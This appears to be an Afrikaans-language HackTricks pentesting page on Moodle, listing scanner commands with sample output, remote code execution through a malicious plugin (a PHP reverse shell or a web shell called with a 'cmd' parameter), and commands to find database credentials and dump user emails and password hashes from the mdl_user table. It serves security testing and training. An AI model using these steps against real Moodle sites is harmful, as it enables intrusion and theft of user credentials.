HackTricksMoodle
Reading time: 3 minutes
tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Outomatiese Skande
droopescan
pip3 install droopescan
droopescan scan moodle -u http://moodle.example.com/<moodle_path>/
[+] Plugins found:
forum http://moodle.schooled.htb/moodle/mod/forum/
http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
http://moodle.schooled.htb/moodle/mod/forum/version.php
[+] No themes found.
[+] Possible version(s):
3.10.0-beta
[+] Possible interesting urls found:
Static readme file. - http://moodle.schooled.htb/moodle/README.txt
Admin panel - http://moodle.schooled.htb/moodle/login/
[+] Scan finished (0:00:05.643539 elapsed)
moodlescan
#Install from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/
Version 0.7 - Dic/2020
.............................................................................................................
By Victor Herrera - supported by www.incode.cl
.............................................................................................................
Getting server information http://moodle.schooled.htb/moodle/ ...
server : Apache/2.4.46 (FreeBSD) PHP/7.4.15
x-powered-by : PHP/7.4.15
x-frame-options : sameorigin
last-modified : Wed, 07 Apr 2021 21:33:41 GMT
Getting moodle version...
Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta
Searching vulnerabilities...
Vulnerabilities found: 0
Scan completed.
CMSMap
pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://moodle.example.com/<moodle_path>
CVEs
Ek het gevind dat die outomatiese gereedskap redelik nutteloos is om kwesbaarhede wat die moodle weergawe raak, te vind. Jy kan kontroleer daarvoor in https://snyk.io/vuln/composer:moodle%2Fmoodle
RCE
Jy moet 'n bestuurder rol hê en jy kan plugins installeer binne die "Site administration" tab**:**
.png)
As jy 'n bestuurder is, mag jy steeds hierdie opsie moet aktiveer. Jy kan sien hoe in die moodle privilege escalation PoC: https://github.com/HoangKien1020/CVE-2020-14321.
Dan kan jy die volgende plugin installeer wat die klassieke pentest-monkey php rev shell bevat (voor jy dit op laai, moet jy dit ontbind, die IP en poort van die revshell verander en dit weer saamdruk)
Of jy kan die plugin van https://github.com/HoangKien1020/Moodle_RCE gebruik om 'n gewone PHP shell met die "cmd" parameter te kry.
Om die kwaadwillige plugin te begin, moet jy toegang hê tot:
http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id
POST
Vind databasis geloofsbriewe
find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
Dump Kredensiale uit databasis
/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.